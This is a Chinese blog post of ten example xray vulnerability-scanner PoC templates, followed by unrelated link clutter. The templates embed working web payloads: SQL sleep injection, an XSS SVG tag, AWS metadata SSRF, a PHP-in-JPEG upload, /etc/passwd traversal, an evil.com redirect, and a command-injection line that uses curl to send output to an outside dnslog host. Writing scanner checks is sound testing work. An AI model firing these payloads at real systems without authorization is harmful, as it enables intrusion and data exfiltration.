xray-poc编写示例

已于 2025-05-01 23:42:49 修改
阅读量130 收藏
点赞数
分类专栏: 黑客编程:自研工具与POC开发指南 文章标签: 渗透测试
于 2025-05-01 23:39:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/147657074
版权

禁止未授权扫描和测试行为!!!

1. SQL 时间盲注检测 (Time-Based Blind SQLi)

name: generic/time-based-sqli
rules:
  - method: GET
    path: "/product?id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--+"
    expression: |
      response.status == 200 && response.body.duration >= 5000
    detail: |
      Detected time-based SQL injection via SLEEP(5) payload.
      Vulnerable parameter: id

2. 通用 DOM 型 XSS 检测

name: generic/dom-xss
rules:
  - method: GET
    path: "/search?q=<svg/onload=alert(1)>"
    expression: |
      response.status == 200 && response.body.bcontains(b"<svg") && response.headers["Content-Type"].contains("text/html")
    detail: |
      Potential DOM XSS via unencoded SVG payload in search parameter

3. SSRF 检测

name: generic/ssrf-aws-metadata
rules:
  - method: POST
    path: "/api/import"
    body: |
      {"url":"http://169.254.169.254/latest/meta-data/"}
    expression: |
      response.status == 200 && response.body.bmatches(b'(?i)instance-id|ami-id')
    detail: |
      SSRF vulnerability exposing AWS metadata service

4. 文件上传绕过检测 (Polyglot JPEG)

name: generic/file-upload-bypass
rules:
  - method: POST
    path: "/upload"
    headers:
      Content-Type: multipart/form-data; boundary=XRAY
    body: |
      --XRAY
      Content-Disposition: form-data; name="file"; filename="test.jpg"
      Content-Type: image/jpeg
      
      \xFF\xD8\xFF\xE0<?php echo md5(123); ?>
      --XRAY--
    expression: |
      response.status == 200 && response.body.bmatches(b'[a-f0-9]{32}')
    detail: |
      File upload bypass via polyglot JPEG/PHP file

5. RCE 检测 (命令注入盲测)

name: generic/rce-blind
rules:
  - method: GET
    path: "/api/ping?ip=127.0.0.1;curl${IFS}http://dnslog.ceye.io/$(date|md5sum|cut${IFS}-c1-8)"
    expression: |
      response.status == 200
    search: |
      dnslog.ceye.io
    detail: |
      Blind RCE via command injection with DNS exfiltration

6. 目录遍历高级检测

name: generic/path-traversal
rules:
  - method: GET
    path: "/download?file=....//....//....//etc/passwd"
    expression: |
      response.status == 200 && response.body.bmatches(b'(root:[x*]:0:0:)')
    detail: |
      Path traversal via nested directory backtracking

7. 反序列化漏洞检测

name: generic/java-deserialization
rules:
  - method: POST
    path: "/api/data"
    headers:
      Content-Type: application/java-serialized-object
    body: |
      rO0ABXQAAAAAAAQA... (Base64编码的 CommonsCollections5 payload)
    expression: |
      response.status == 500 &&
      response.body.bmatches(b'(?i)InvokerTransformer|CommonsCollections)')
    detail: |
      Java deserialization vulnerability detected via CommonsCollections gadget

8. JWT 弱密钥检测

name: generic/jwt-weak-key
rules:
  - method: GET
    path: "/api/user"
    headers:
      Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
    expression: |
      response.status == 200 && response.headers["Set-Cookie"].contains("invalid_token") == false
    detail: |
      JWT vulnerable to HS256 brute-force (tested with secret key 'secret')

9. OAuth 开放重定向

name: generic/oauth-open-redirect
rules:
  - method: GET
    path: "/oauth/authorize?redirect_uri=http://evil.com"
    expression: |
      response.status == 302 && response.headers["Location"].startswith("http://evil.com")
    detail: |
      Open redirect vulnerability in OAuth authorization endpoint

10. 权限越权漏洞检测

name: generic/idor
variables:
  user_id: "randomInt(1000,9999)"
rules:
  - method: GET
    path: "/api/user/{{user_id}}"
    expression: response.status == 403
  - method: GET
    path: "/api/user/{{user_id}}"
    headers: 
      X-Original-User-ID: "admin"
    expression: |
      response.status == 200 && response.body.bmatches(b'"role":"admin"')
    detail: |
      IDOR vulnerability via X-Original-User-ID header manipulation
goby内测版联合xray高级版详细说明加举例Apache Tomcat示例目录漏洞
记录并分享学习安全的知识点..
01-23 1731
一、Goby介绍 Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速地从一个验证入口点,切换到横向。我们希望能够输出更具生命力的工具,能够对标黑客的实际能力,帮助企业来有效地理解和应对网络攻击。 下载链接: 奶牛快传 - 免费大文件传输工具,上传下载不限速 二、xray高级版 xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要.
网安工具系列(仅供参考):学习笔记-nuclei
weixin_54626591的博客
04-17 307
学习笔记-nuclei
干货 - Xray POC编写指南,从零基础到精通,收藏这篇就够了!
Libra1313的博客
03-31 774
还在为Xray POC编写头疼?别慌!这篇“食用指南”带你,轻松编写属于你的专属POC!🚀。
探索网络安全新工具:XRay POC Generation
gitblog_00054的博客
03-28 476
探索网络安全新工具:XRay POC Generation 去发现同类优质开源项目:https://gitcode.com/ 在网络安全领域,有效的漏洞检测和利用是保障系统安全的关键步骤。 是一个由 phith0n 开发的开源项目,它旨在自动化生成 Proof of Concept (PoC) 代码,帮助安全研究人员快速验证已知的安全漏洞。 项目简介 XRay POC Generation 是一套...
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 3061
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
推荐开源神器:pocGoby2Xray,打通Goby与XrayPoc转换桥梁!
gitblog_00619的博客
09-08 843
推荐开源神器:pocGoby2Xray,打通Goby与XrayPoc转换桥梁! pocGoby2Xray将Goby的json格式Poc转为xray的yaml格式Poc项目地址:https://gitcode.com/gh_mirrors/po/pocGoby2Xray 网络安全领域的探索者们,你们好!今天,我要向大家隆重推荐一个极具实用价值的开源项目——pocGoby2Xray。这个项目如同一...
xray API漏洞检测
无痕的博客
02-24 1064
xray检测识别API漏洞
Web漏洞扫描工具Xray:长亭自研的完善安全评估工具详解
Java程序员_编程开发学习笔记_网站安全运维教程_渗透技术教程
04-04 1042
Xray是长亭科技自主研发的一款完善的安全评估工具,专注于Web应用安全检测。它支持对常见Web安全问题进行自动化扫描,并提供了强大的自定义POC(Proof of Concept)功能,能够根据用户需求扩展检测能力。
xray漏洞扫描工具 详细用法
m0_69043895的博客
04-21 2227
工具介绍xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有:●检测速度快。发包速度快;漏洞检测算法效率高。●支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。●代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。●高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以客制化功能。●安全无威胁。
23.一款功能强大的安全评估工具 - Xray
2501_90886018的博客
03-14 1051
专注于 Web 应用的漏洞扫描与安全检测。其通过高效的漏洞检测算法和灵活的配置选项,帮助安全人员快速发现并修复潜在的安全风险,适用于红队渗透、漏洞验证及安全审计等场景。,用户可高效完成 Web 应用的安全评估任务,建议结合。启用基础爬虫,自动爬取目标网站的链接并进行扫描。将扫描结果保存为 HTML 文件(如。是一款由长亭科技开发的功能强大的。启动代理模式,监听指定地址(如。文件需导入浏览器或系统证书库。,浏览目标网站即可开始扫描。构建完整的漏洞检测链。扫描单个 URL(如。
渗透测试之信息收集工具<>神器Xray -Xapp<>高阶段手法 爬虫以及被动代理模式
热门推荐
浩策盾悟
01-23 1万+
/// ._/\/v0.0.2\/[INF] 25-01-12 13:52:03 更新配置文件于以下位置:C:\Users\Administrator\.xray\xapp\xapp-config.example.yaml [app.go:385][INF] 25-01-12 13:52:03 使用以下位置的配置文件:C:\Users\Administrator\.xray\xapp\xapp-config.yaml [app.go:447]
xray编写poc burpsuite
08-22
编写一个PoC(Proof of Concept)来使用xray和burpsuite进行联动,可以按照以下步骤进行操作: 1. 首先,使用Burp Suite的原生和xray建立多层代理,将流量从Burp Suite转发到xray中。 2. 确保已经安装并配置好...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6012
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
北京市城-郊梯度森林表土碳组分及其影响因素数据集(2019)
05-02
作者于2019年6月下旬至7月初,从北京市中心(紫禁城)到郊区设置了4条不同走向(东北、西北、西南和正南)的城—郊梯度样带;随机选取了20个独立的城市森林公园进行采样。每个公园选择3块典型森林斑块,采集表层(0-10 cm)和亚表层(10-20 cm)土壤样品,并测定了土壤总碳含量、土壤有机碳含量、颗粒态有机碳和矿物结合态有机碳含量。该数据集内容包括:(1)样点位置数据;(2)研究区森林表土总碳、总有机碳、总无机碳、颗粒态有机碳和矿物结合态有机碳含量;(3)森林表土碳组分含量与不同影响因素数据,包括:土壤数据(土壤pH、土壤粘粉粒含量)、植被数据(植被覆盖度、公园年龄、树种多样性)、气候数据(年均温、年降水量)。数据集存储为.shp和.xlsx格式,由8个数据文件组成,数据量为30.7 KB(压缩为1个文件,27 KB)。田越韩, 郭泓伯, 高晓飞等. 北京森林表土碳组分城郊梯度变化及其影响因素[J]. 地理学报, 2024, 79(1): 206-217. DOI: 10.11821/dlxb202401013.
USB转串口模块:CH340与FT232双选,61*35mm尺寸,原理图&PCB版
05-02
内容概要:本文详细介绍了集成CH340和FT232两款芯片的USB转串口模块的设计与应用。该模块尺寸为61x35mm,采用跳线帽进行芯片切换,支持多种接口(USB-A公头、Mini USB母座)和电源输出(5V和3.3V)。文中探讨了硬件配置、电源设计、信号切换电路以及PCB布局等方面的细节,并提供了Python、Arduino和Linux下的代码示例来展示不同场景下的使用方法。此外,还分享了一些实际项目中的经验和注意事项,如波特率适配、电磁兼容性和稳压电路设计等。 适合人群:从事嵌入式系统开发、硬件设计及相关领域的工程师和技术爱好者。 使用场景及目标:适用于需要灵活选择USB转串口芯片的项目,特别是在工业级应用场景中,能够提供稳定的通信解决方案。目标是帮助开发者更好地理解和利用这一模块,提高开发效率和产品质量。 其他说明:文中提到的双芯片设计方案不仅兼顾了成本效益,还能满足不同项目的特定需求。对于初学者来说,可以通过提供的代码示例快速上手;而对于资深工程师,则可以深入研究硬件设计细节,优化现有产品。
基于水平集进化的轮廓提取MATLAB代码实现及优化策略研究
05-02
内容概要:本文详细探讨了利用MATLAB实现水平集进化进行图像轮廓提取的方法。首先介绍了传统的水平集演化方法存在的问题,如频繁的重新初始化导致计算效率低下和分割精度波动。接着提出了一种改进方案,即在演化方程中引入正则化项来自适应地维护水平集的良好状态,从而避免了显式的重新初始化操作。此外,还讨论了曲率计算方法的优化以及参数选择的影响,并展示了改进前后算法性能的具体对比实验结果。 适合人群:从事图像处理、计算机视觉领域的研究人员和技术开发者,尤其是对水平集方法有一定了解并希望提高其实战应用效果的专业人士。 使用场景及目标:适用于需要精确分割图像中目标对象的应用场合,如医学影像分析(CT、MRI)、遥感图像处理等。主要目的是提升图像分割的速度和准确性,同时降低计算资源消耗。 其他说明:文中提供了多个MATLAB代码片段用于解释各个关键技术点,便于读者理解和实践。对于想要深入了解水平集演化的机制及其优化策略的人来说是非常有价值的参考资料。
MLP信息熵随深度增加的变化
最新发布
05-02
MLP信息熵研究完整代码
西门子S7-200 PLC与触摸屏实现的恒压供水系统全套图纸程序:一拖二与一拖三配置的实践应用
05-02
内容概要:本文详细介绍了基于西门子S7-200 PLC的恒压供水系统的设计与实现。系统采用一拖二或一拖三模式,确保供水系统的可靠性。核心组件包括PLC、富士PID控制模块和ABB变频器,通过精确的压力控制和快速响应,实现了稳定的恒压供水。文中提供了详细的PLC程序示例,涵盖水泵启停控制、PID算法调用以及变频器频率调节等功能。此外,还展示了触摸屏界面设计,用于实时监控和操作。硬件配置方面,强调了柜体制作图纸的重要性和规范性,确保电气接线正确无误。调试过程中,作者分享了许多实用技巧,如PID参数整定、变频器设置和故障切换逻辑等。 适合人群:从事工业自动化领域的工程师和技术人员,尤其是对PLC编程和恒压供水系统感兴趣的读者。 使用场景及目标:适用于工业现场的恒压供水系统设计与实施,旨在提高供水系统的稳定性和可靠性,减少因设备故障导致的生产中断。 其他说明:本文不仅提供了完整的硬件配置和软件编程指导,还分享了丰富的实战经验和调试技巧,帮助读者更好地理解和应用相关技术。
恒压供水系统:西门子224xp PLC与ABB变频器一拖二(一对一变频)控制系统
05-02
内容概要:本文详细介绍了基于西门子224XP PLC和ABB ACS510变频器的一对一变频恒压供水系统的设计与实现。系统旨在保持管网压力恒定,确保用户在不同用水需求下获得稳定水压。硬件配置包括西门子S7-224XP PLC、ABB ACS510变频器以及昆仑通态触摸屏。系统采用双PID控制策略,分为低频段和高频段控制,以提高响应速度和稳定性。此外,通过合理的逻辑设计实现了变频器之间的无缝切换,确保压力波动最小。实际应用案例表明,该系统显著减少了压力波动,降低了能耗,提升了用户满意度。 适合人群:从事工业自动化领域的工程师和技术人员,特别是对PLC编程和变频器配置有一定经验的人群。 使用场景及目标:适用于需要恒压供水的高层建筑、住宅小区等场所,目标是实现高效的水资源管理和节能降耗。 其他说明:文中还分享了一些调试技巧和注意事项,如变频器参数配置、PID参数调整、模拟量输出切换逻辑等,有助于实际项目的顺利实施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WHOAMI_老猫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值